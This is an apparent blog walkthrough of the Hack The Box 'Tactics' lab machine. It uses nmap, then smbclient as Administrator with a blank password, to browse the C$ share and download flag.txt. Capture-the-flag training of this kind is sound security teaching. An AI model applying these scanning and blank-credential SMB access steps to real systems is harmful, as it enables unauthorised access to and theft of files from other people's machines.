top of page

Tactics (VIP only)


Enumeration


As usual let's start with nmap:

nmap -sV -sC IP

Replace IP by the IP of your target machine (Tactics)


The IP of the target machines are always changing so make sure you type the correct one. You can find it on your Hack The Box account.

We get the error message "The hosts seems down".


Let's try to ping it to make sure:

ping IP

OK the ping tells us that it is well and truly alive.


Press Ctrl C to stop the ping from running over and over again

Perhaps, a firewall is blocking our nmap. Let's try -Pn then:

nmap -sC -Pn IP

This time it worked and we can see port 445 is open, which is the SMB port.



Foothold


smbclient -L IP 

-L : List all available shares on the target


When prompted for password just press enter and see if we can get in with no password.

OK this failed so we probably need to provide a username.


Let's try the username Administrator

smbclient -L IP -U Administrator

-U stands for Username


When prompted to enter the password, let's try our luck and just press enter.

It worked! we are in, and can see a list of available shares for us to look at.


Let's look at the C$ share for instance:

smbclient \\\\IP\\C$ -U Administrator

Let's look around using cd and ls:

cd Users
ls
cd Administrator
ls
cd Desktop
ls

get flag.txt
The command get will automatically download a copy of the file flag.txt to your machine

Now go to your home directory and you can see the flag.txt file has been downloaded to your machine:

Open the file:

Congratulations! You got the flag!


2,666 views0 comments

Recent Posts

See All

Archetype

Comments

Rated 0 out of 5 stars.
No ratings yet

Add a rating
bottom of page